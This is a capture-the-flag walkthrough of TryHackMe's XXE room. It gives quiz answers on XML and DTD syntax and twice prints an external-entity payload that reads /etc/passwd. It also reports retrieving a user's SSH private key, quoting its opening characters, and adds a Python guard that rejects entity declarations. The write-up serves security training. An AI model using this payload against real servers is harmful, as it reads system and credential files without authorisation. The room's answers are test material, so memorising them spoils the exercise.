The Dutch Hacker

XXE on Tryhackme

This is the write-up for the XXE room on TryHackMe, which is part of the Web Fundamentals path.

Connect to the TryHackMe lab environment over the VPN, or use the AttackBox on the TryHackMe site.

Tasks XXE

Task 1

Read everything in the task and start the machine attached to it.

Task 2

Read everything in the task. All answers can be found in the task text.

2.1 Full form of XML

Answer: eXtensible Markup Language

2.2 Is XML case sensitive?    

Answer: yes

2.3 Is it compulsory to have XML prolog in XML documents?    

Answer: No

2.4 Can we validate XML documents against a schema?

Answer: Yes

2.5 How can we specify XML version and encoding in XML document?

Answer: XML prolog

Task 3

All answers can be found in the text of the task.

3.1 With what extension do you save a DTD file?

Answer: dtd

3.2 How do you define a new ELEMENT?

Answer: !ELEMENT

3.3 How do you define a ROOT element?

Answer: !DOCTYPE

3.4 How do you define a new ENTITY?

Answer: !ENTITY

Task 4

Navigate to http://MACHINE_IP in Firefox, then enter the payload and press the Submit button.

Payload:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
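
The payload above only works because the server's XML parser accepts a DOCTYPE with an external entity. As an added example (not part of the room or the original write-up), this is one way a Python service could reject such input before building a tree; the helper name parse_untrusted and the ForbiddenXML exception are hypothetical, and the only sample input is the payload shown above.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class ForbiddenXML(ValueError):
    """Raised when untrusted XML uses a DTD feature that enables XXE."""


# The Task 4 payload from this write-up, embedded as sample input.
PAGE_PAYLOAD = (
    b'<?xml version="1.0"?>\n'
    b"<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>\n"
    b"<root>&read;</root>"
)


def parse_untrusted(data: bytes, allow_doctype: bool = False) -> ET.Element:
    """Hypothetical helper: pre-scan with expat, then build the tree."""

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Strictest setting: no DTD at all, so no entities can be declared.
        if not allow_doctype:
            raise ForbiddenXML(f"DOCTYPE not allowed (root={name!r})")

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Even when a DOCTYPE is tolerated, entity declarations are refused.
        kind = "external" if system_id or public_id else "internal"
        raise ForbiddenXML(f"ENTITY declaration not allowed ({kind} entity {name!r})")

    def on_external_ref(context, base, system_id, public_id):
        raise ForbiddenXML(f"external reference not allowed ({system_id!r})")

    guard = expat.ParserCreate()
    guard.StartDoctypeDeclHandler = on_doctype
    guard.EntityDeclHandler = on_entity_decl
    guard.ExternalEntityRefHandler = on_external_ref
    guard.Parse(data, True)  # handler exceptions propagate out of Parse()
    return ET.fromstring(data)  # reached only if the guard saw nothing forbidden


if __name__ == "__main__":
    print(parse_untrusted(b"<root>Falcon</root>").text)
    try:
        parse_untrusted(PAGE_PAYLOAD)
    except ForbiddenXML as exc:
        print("rejected:", exc)
```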

Task 5

5.1 Try to display your own name using any payload.

Payload:

[Image: XXE Attack]

5.2 See if you can read /etc/passwd

We already did this in the previous task.

Payload:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

5.3 What is the name of the user in /etc/passwd?

Answer: Falcon

5.3 Where is falcon’s SSH key located?

Payload:

[Image: XXE Attack]

Answer: MIIEogIBAAKCAQEA7b
